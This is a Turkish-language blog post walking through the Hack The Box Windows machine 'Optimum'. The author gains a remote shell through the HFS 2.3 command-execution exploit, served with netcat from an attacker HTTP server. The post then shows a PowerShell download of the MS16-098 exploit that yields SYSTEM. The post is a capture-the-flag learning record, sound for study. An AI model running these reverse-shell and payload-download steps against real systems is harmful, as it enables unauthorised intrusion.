{"id":1421,"date":"2021-07-28T15:15:13","date_gmt":"2021-07-28T15:15:13","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1421"},"modified":"2022-06-11T09:12:14","modified_gmt":"2022-06-11T09:12:14","slug":"optimum","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/28\/optimum\/","title":{"rendered":"Optimum"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Optimum\" title=\"Optimum\">Optimum<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/bb09ffeaffe2f5220a1d591bb7b4f95e.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-28 10:58 EDT\nNmap scan report for 10.10.10.8\nHost is up (0.073s latency).\nNot shown: 65534 filtered ports\nPORT   STATE SERVICE VERSION\n80\/tcp open  http    HttpFileServer httpd 2.3\n|_http-server-header: HFS 2.3\n|_http-title: HFS \/\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone\nRunning (JUST GUESSING): Microsoft Windows 2012|7|8|Phone|2008|8.1|Vista (91%)\nOS CPE: cpe:\/o:microsoft:windows_server_2012:r2 cpe:\/o:microsoft:windows_7::-:professional cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_8.1 cpe:\/o:microsoft:windows_vista::- cpe:\/o:microsoft:windows_vista::sp1\nAggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT      ADDRESS\n1   74.29 ms 10.10.14.1\n2   74.73 ms 10.10.10.8\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 255.73 seconds\n<\/code><\/pre>\n<p>Sadece 80 a\u00e7\u0131k.  Sayfaya gitti\u011fimde <strong>HttpFileServer 2.3<\/strong> uygulamas\u0131n\u0131 g\u00f6rd\u00fcm. Bunun \u00fczerine uygulamaya ait exploitleri ara\u015ft\u0131rmaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# searchsploit Rejetto Http File Server 2.3.x\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nRejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                                         | windows\/remote\/34668.txt\nRejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                                                         | windows\/remote\/39161.py\nRejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                                                                                                                                 | windows\/webapps\/49125.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# cp $(locate windows\/remote\/39161.py) .\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# head -n 20 39161.py                           \n#!\/usr\/bin\/python\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\n# Google Dork: intext:&quot;httpfileserver 2.3&quot;\n# Date: 04-01-2016\n# Remote: Yes\n# Exploit Author: Avinash Kumar Thapa aka &quot;-Acid&quot;\n# Vendor Homepage: http:\/\/rejetto.com\/\n# Software Link: http:\/\/sourceforge.net\/projects\/hfs\/\n# Version: 2.3.x\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\n# CVE : CVE-2014-6287\n# Description: You can use HFS (HTTP File Server) to send and receive files.\n#          It&#039;s different from classic file sharing because it uses web technology to be more compatible with today&#039;s Internet.\n#          It also differs from classic web servers because it&#039;s very easy to use and runs &quot;right out-of-the box&quot;. Access your remote files, over the network. It has been successfully tested with Wine under Linux. \n\n#Usage : python Exploit.py &lt;Target IP address&gt; &lt;Target Port Number&gt;\n\n#EDB Note: You need to be using a web server hosting netcat (http:\/\/&lt;attackers_ip&gt;:80\/nc.exe).  \n#          You may need to run it multiple times for success!\n<\/code><\/pre>\n<p>Bulmu\u015f oldu\u011fumuz exploit'in baz\u0131 ba\u011f\u0131ml\u0131klar\u0131 bulunmakta bunun i\u00e7in nc arac\u0131na ve bir http arac\u0131na ihtiyac\u0131m\u0131z var.<br \/>\n\u00d6nceklikle nc arac\u0131n\u0131 indirelim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# wget https:\/\/github.com\/kudayDOTsite\/fuzzdb\/raw\/master\/web-backdoors\/exe\/nc.exe   \n--2021-07-28 08:29:55--  https:\/\/github.com\/kudayDOTsite\/fuzzdb\/raw\/master\/web-backdoors\/exe\/nc.exe\nResolving github.com (github.com)... 140.82.121.4\nConnecting to github.com (github.com)|140.82.121.4|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/raw.githubusercontent.com\/kudayDOTsite\/fuzzdb\/master\/web-backdoors\/exe\/nc.exe [following]\n--2021-07-28 08:29:56--  https:\/\/raw.githubusercontent.com\/kudayDOTsite\/fuzzdb\/master\/web-backdoors\/exe\/nc.exe\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 28160 (28K) [application\/octet-stream]\nSaving to: \u2018nc.exe\u2019\n\nnc.exe                                                      100%[=========================================================================================================================================&gt;]  27.50K  --.-KB\/s    in 0.01s   \n\n2021-07-28 08:29:56 (1.92 MB\/s) - \u2018nc.exe\u2019 saved [28160\/28160]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# ls\n39161.py  nc.exe\n<\/code><\/pre>\n<p>\u015eimdi http sunucusunu aya\u011fa kald\u0131ral\u0131m. Ve exploiti al\u0131\u015ft\u0131ral\u0131m. Exploiti \u00e7al\u0131\u015ft\u0131rmadan \u00f6nce reverse i\u00e7in i\u00e7eride kendi ip'nizi setlemeyi unutmay\u0131n.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# python2 39161.py 10.10.10.8 80<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# python3 -m http.server 80              \nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n10.10.10.8 - - [28\/Jul\/2021 08:31:04] &quot;GET \/nc.exe HTTP\/1.1&quot; 200 -\n10.10.10.8 - - [28\/Jul\/2021 08:31:04] &quot;GET \/nc.exe HTTP\/1.1&quot; 200 -\n10.10.10.8 - - [28\/Jul\/2021 08:31:04] &quot;GET \/nc.exe HTTP\/1.1&quot; 200 -\n10.10.10.8 - - [28\/Jul\/2021 08:31:04] &quot;GET \/nc.exe HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# nc -lvp 443 \nlistening on [any] 443 ...\n10.10.10.8: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.8] 49162\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\kostas\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D0BC-0196\n\n Directory of C:\\Users\\kostas\\Desktop\n\n03\/08\/2021  11:56 \ufffd\ufffd    &lt;DIR&gt;          .\n03\/08\/2021  11:56 \ufffd\ufffd    &lt;DIR&gt;          ..\n18\/03\/2017  03:11 \ufffd\ufffd           760.320 hfs.exe\n18\/03\/2017  03:13 \ufffd\ufffd                32 user.txt.txt\n               2 File(s)        760.352 bytes\n               2 Dir(s)  31.887.118.336 bytes free\n\nC:\\Users\\kostas\\Desktop&gt;type user.txt.txt\ntype user.txt.txt\nd0c39******************************\nC:\\Users\\kostas\\Desktop&gt;<\/code><\/pre>\n<p>Harika ilk flagi ald\u0131k. Makine eski bir makine bu y\u00fczden \u00e7ok falza g\u00fcvenlik a\u00e7\u0131\u011f\u0131 mevcut. Hemen bunlar\u0131 ara\u015ft\u0131rmak i\u00e7in <strong>systeminfo<\/strong> dosyas\u0131 olu\u015fturup kali'ye kopyalad\u0131m.<\/p>\n<pre><code class=\"language-sh\">C:\\Users\\kostas\\Desktop&gt;cmd.exe \/c systeminfo &gt; systeminfo.txt\ncmd.exe \/c systeminfo &gt; systeminfo.txt\n\nC:\\Users\\kostas\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D0BC-0196\n\n Directory of C:\\Users\\kostas\\Desktop\n\n04\/08\/2021  12:33 \ufffd\ufffd    &lt;DIR&gt;          .\n04\/08\/2021  12:33 \ufffd\ufffd    &lt;DIR&gt;          ..\n18\/03\/2017  03:11 \ufffd\ufffd           760.320 hfs.exe\n04\/08\/2021  12:33 \ufffd\ufffd             3.334 systeminfo.txt\n18\/03\/2017  03:13 \ufffd\ufffd                32 user.txt.txt\n               3 File(s)        763.686 bytes\n               2 Dir(s)  31.887.114.240 bytes free\n\nC:\\Users\\kostas\\Desktop&gt;type systeminfo.txt\ntype systeminfo.txt\n\nHost Name:                 OPTIMUM\nOS Name:                   Microsoft Windows Server 2012 R2 Standard\nOS Version:                6.3.9600 N\/A Build 9600\nOS Manufacturer:           Microsoft Corporation\nOS Configuration:          Standalone Server\nOS Build Type:             Multiprocessor Free\nRegistered Owner:          Windows User\nRegistered Organization:   \nProduct ID:                00252-70000-00000-AA535\nOriginal Install Date:     18\/3\/2017, 1:51:36 \ufffd\ufffd\nSystem Boot Time:          3\/8\/2021, 11:54:43 \ufffd\ufffd\nSystem Manufacturer:       VMware, Inc.\nSystem Model:              VMware Virtual Platform\nSystem Type:               x64-based PC\nProcessor(s):              1 Processor(s) Installed.\n                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz\nBIOS Version:              Phoenix Technologies LTD 6.00, 12\/12\/2018\nWindows Directory:         C:\\Windows\nSystem Directory:          C:\\Windows\\system32\nBoot Device:               \\Device\\HarddiskVolume1\nSystem Locale:             el;Greek\nInput Locale:              en-us;English (United States)\nTime Zone:                 (UTC+02:00) Athens, Bucharest\nTotal Physical Memory:     4.095 MB\nAvailable Physical Memory: 3.485 MB\nVirtual Memory: Max Size:  5.503 MB\nVirtual Memory: Available: 4.938 MB\nVirtual Memory: In Use:    565 MB\nPage File Location(s):     C:\\pagefile.sys\nDomain:                    HTB\nLogon Server:              \\\\OPTIMUM\nHotfix(s):                 31 Hotfix(s) Installed.\n                           [01]: KB2959936\n                           [02]: KB2896496\n                           [03]: KB2919355\n                           [04]: KB2920189\n                           [05]: KB2928120\n                           [06]: KB2931358\n                           [07]: KB2931366\n                           [08]: KB2933826\n                           [09]: KB2938772\n                           [10]: KB2949621\n                           [11]: KB2954879\n                           [12]: KB2958262\n                           [13]: KB2958263\n                           [14]: KB2961072\n                           [15]: KB2965500\n                           [16]: KB2966407\n                           [17]: KB2967917\n                           [18]: KB2971203\n                           [19]: KB2971850\n                           [20]: KB2973351\n                           [21]: KB2973448\n                           [22]: KB2975061\n                           [23]: KB2976627\n                           [24]: KB2977629\n                           [25]: KB2981580\n                           [26]: KB2987107\n                           [27]: KB2989647\n                           [28]: KB2998527\n                           [29]: KB3000850\n                           [30]: KB3003057\n                           [31]: KB3014442\nNetwork Card(s):           1 NIC(s) Installed.\n                           [01]: Intel(R) 82574L Gigabit Network Connection\n                                 Connection Name: Ethernet0\n                                 DHCP Enabled:    No\n                                 IP address(es)\n                                 [01]: 10.10.10.8\nHyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.\n\nC:\\Users\\kostas\\Desktop&gt;<\/code><\/pre>\n<p>\u015eimdi bunu <a href=\"https:\/\/github.com\/AonCyberLabs\/Windows-Exploit-Suggester\" title=\"Windows-Exploit-Suggester\">Windows-Exploit-Suggester<\/a> arac\u0131 ile inceleyelim. Bu ara\u00e7 ne yaz\u0131kki python2 ile geli\u015ftirilmi\u015f. Ger\u00e7i python3 halini biri yazm\u0131\u015f ve request'te bulunmu\u015f ancak biz python2 hali ile kullanmaya devam edelim. Kalide repoya k\u00fct\u00fcphane eklerken s\u0131k\u0131nt\u0131 ya\u015fayaca\u011f\u0131n\u0131z\u0131 d\u00fc\u015f\u00fcn\u00fcyorum. pip2'yi kurabilmek i\u00e7in <a href=\"http:\/\/144.76.171.171\/blog\/index.php\/python2-laneti-pip2\/\">http:\/\/144.76.171.171\/blog\/index.php\/python2-laneti-pip2\/<\/a> yaz\u0131s\u0131n\u0131 inceleyebilirsiniz. Arac\u0131 ba\u015far\u0131l\u0131 bir \u015fekilde kurdu\u011funuzu varsayarak devam ediyorum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/tool\/Windows-Exploit-Suggester]\n\u2514\u2500# python windows-exploit-suggester.py --database 2021-07-28-mssb.xls --systeminfo \/root\/oscp\/htb\/Optmum\/systeminfo.txt\n[*] initiating winsploit version 3.3...\n[*] database file detected as xls or xlsx based on extension\n[*] attempting to read from the systeminfo input file\n[+] systeminfo input file read successfully (utf-8)\n[*] querying database file for potential vulnerabilities\n[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits\n[*] there are now 246 remaining vulns\n[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin\n[+] windows version identified as &#039;Windows 2012 R2 64-bit&#039;\n[*] \n[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/40745\/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)\n[*]   https:\/\/www.exploit-db.com\/exploits\/41015\/ -- Microsoft Windows Kernel - &#039;win32k.sys&#039; &#039;NtSetWindowLongPtr&#039; Privilege Escalation (MS16-135) (2)\n[*]   https:\/\/github.com\/tinysec\/public\/tree\/master\/CVE-2016-7255\n[*] \n[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/41020\/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)\n[*] \n[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important\n[*]   https:\/\/github.com\/foxglovesec\/RottenPotato\n[*]   https:\/\/github.com\/Kevin-Robertson\/Tater\n[*]   https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege\n[*]   https:\/\/foxglovesecurity.com\/2016\/01\/16\/hot-potato\/ -- Hot Potato - Windows Privilege Escalation\n[*] \n[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39990\/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads\/Memory Disclosure (MS16-074), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39991\/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC\n[*] \n[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/39994\/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC\n[*] \n[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/40107\/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF\n[*]   https:\/\/www.exploit-db.com\/exploits\/39574\/ -- Microsoft Windows 8.1\/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39719\/ -- Microsoft Windows 7-10 &amp; Server 2008-2012 (x32\/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39809\/ -- Microsoft Windows 7-10 &amp; Server 2008-2012 (x32\/x64) - Local Privilege Escalation (MS16-032) (C#)\n[*] \n[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/40085\/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF\n[*]   https:\/\/www.exploit-db.com\/exploits\/39788\/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39432\/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC\n[*] \n[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important\n[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https:\/\/www.exploit-db.com\/exploits\/40039\/, PoC\n[*] \n[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/39232\/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39233\/ -- Microsoft Office \/ COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC\n[*] \n[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/38968\/ -- Microsoft Office \/ COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/38918\/ -- Microsoft Office \/ COM Object els.dll DLL Planting (MS15-134), PoC\n[*] \n[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/39698\/ -- Internet Explorer 9\/10\/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)\n[*] \n[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/38474\/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC\n[*] \n[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/38202\/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/38200\/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/38201\/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC\n[*] \n[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/38198\/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/38199\/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC\n[*] \n[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/38222\/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow\n[*] \n[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important\n[*]   https:\/\/www.exploit-db.com\/exploits\/37052\/ -- Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052), PoC\n[*] \n[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important\n[*]   https:\/\/github.com\/hfiref0x\/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37367\/ -- Windows ClientCopyImage Win32k Exploit, MSF\n[*] \n[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/37098\/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC\n[*]   https:\/\/www.exploit-db.com\/exploits\/39035\/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC\n[*] \n[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35661\/ -- Windows 8.1 (32\/64 bit) - Privilege Escalation (ahcache.sys\/NtApphelpCacheControl), PoC\n[*] \n[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35474\/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC\n[*] \n[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical\n[*]   https:\/\/www.exploit-db.com\/exploits\/37800\/\/ -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35308\/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution \/ Powershell VirtualAlloc (MS14-064), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35229\/ -- Internet Explorer &lt;= 11 - OLE Automation Array Remote Code Execution (#1), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35230\/ -- Internet Explorer &lt; 11 - OLE Automation Array Remote Code Execution (MSF), MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35235\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF\n[*]   http:\/\/www.exploit-db.com\/exploits\/35236\/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF\n[*] \n[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important\n[*]   http:\/\/www.exploit-db.com\/exploits\/35055\/ -- Windows OLE - Remote Code Execution &#039;Sandworm&#039; Exploit (MS14-060), PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/35020\/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF\n[*] \n[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35101\/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF\n[*] \n[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important\n[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical\n[*] done<\/code><\/pre>\n<p>Buradaki exploitleri teker teker incelemeye ba\u015flam\u0131\u015ft\u0131m ve bir tanesinin \u00e7oktan derlendi\u011fini g\u00f6rd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# searchsploit 41020     \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nMicrosoft Windows 8.1 (x64) - &#039;RGNOBJ&#039; Integer Overflow (MS16-098)                                                                                                                                          | windows_x86-64\/local\/41020.c\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# searchsploit -m 41020.c\n  Exploit: Microsoft Windows 8.1 (x64) - &#039;RGNOBJ&#039; Integer Overflow (MS16-098)\n      URL: https:\/\/www.exploit-db.com\/exploits\/41020\n     Path: \/usr\/share\/exploitdb\/exploits\/windows_x86-64\/local\/41020.c\nFile Type: C source, ASCII text, with CRLF line terminators\n\nCopied to: \/root\/oscp\/htb\/Optmum\/41020.c\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# head 41020.c\n\/\/ Source: https:\/\/github.com\/sensepost\/ms16-098\/tree\/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80\n\/\/ Binary: https:\/\/github.com\/offensive-security\/exploitdb-bin-sploits\/raw\/master\/bin-sploits\/41020.exe\n\n#include &lt;Windows.h&gt;\n#include &lt;wingdi.h&gt;\n#include &lt;stdio.h&gt;\n#include &lt;winddi.h&gt;\n#include &lt;time.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;Psapi.h&gt;\n<\/code><\/pre>\n<p>Hemen \u00e7al\u0131\u015ft\u0131\u011f\u0131m dizine bu exploiti indirdim.<\/p>\n<pre><code class=\"language-sh\">\nC:\\Users\\kostas\\Desktop&gt;powershell -c &quot;Invoke-WebRequest -Uri http:\/\/10.10.14.12\/41020.exe -OutFile C:\\Users\\kostas\\Desktop\\41020.exe&quot;\npowershell -c &quot;Invoke-WebRequest -Uri http:\/\/10.10.14.12\/41020.exe -OutFile C:\\Users\\kostas\\Desktop\\41020.exe&quot;\n\nC:\\Users\\kostas\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D0BC-0196\n\n Directory of C:\\Users\\kostas\\Desktop\n\n04\/08\/2021  02:44 \ufffd\ufffd    &lt;DIR&gt;          .\n04\/08\/2021  02:44 \ufffd\ufffd    &lt;DIR&gt;          ..\n04\/08\/2021  02:44 \ufffd\ufffd           135.680 41020.exe\n18\/03\/2017  03:11 \ufffd\ufffd           760.320 hfs.exe\n04\/08\/2021  12:33 \ufffd\ufffd             3.334 systeminfo.txt\n18\/03\/2017  03:13 \ufffd\ufffd                32 user.txt.txt\n               4 File(s)        899.366 bytes\n               2 Dir(s)  31.887.454.208 bytes free\n<\/code><\/pre>\n<p>Exploiti \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda...<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Optmum]\n\u2514\u2500# nc -lvp 443                                                                                                                                                                                                                           1 \u2a2f\nlistening on [any] 443 ...\n10.10.10.8: inverse host lookup failed: Unknown host\nconnect to [10.10.14.12] from (UNKNOWN) [10.10.10.8] 49178\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\kostas\\Desktop&gt;whoami\nwhoami\noptimum\\kostas\n\nC:\\Users\\kostas\\Desktop&gt;41020.exe\n41020.exe\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\Users\\kostas\\Desktop&gt;whoami\nwhoami\nnt authority\\system\n\nC:\\Users\\kostas\\Desktop&gt;\n<\/code><\/pre>\n<p>\u015eimdi flagi okuyal\u0131m.<\/p>\n<pre><code class=\"language-sh\">C:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is D0BC-0196\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n18\/03\/2017  03:14 \ufffd\ufffd    &lt;DIR&gt;          .\n18\/03\/2017  03:14 \ufffd\ufffd    &lt;DIR&gt;          ..\n18\/03\/2017  03:14 \ufffd\ufffd                32 root.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  31.885.844.480 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\n51*************************************<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Optimum &#8211; HTB Kolay Windows Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. Starting Nmap 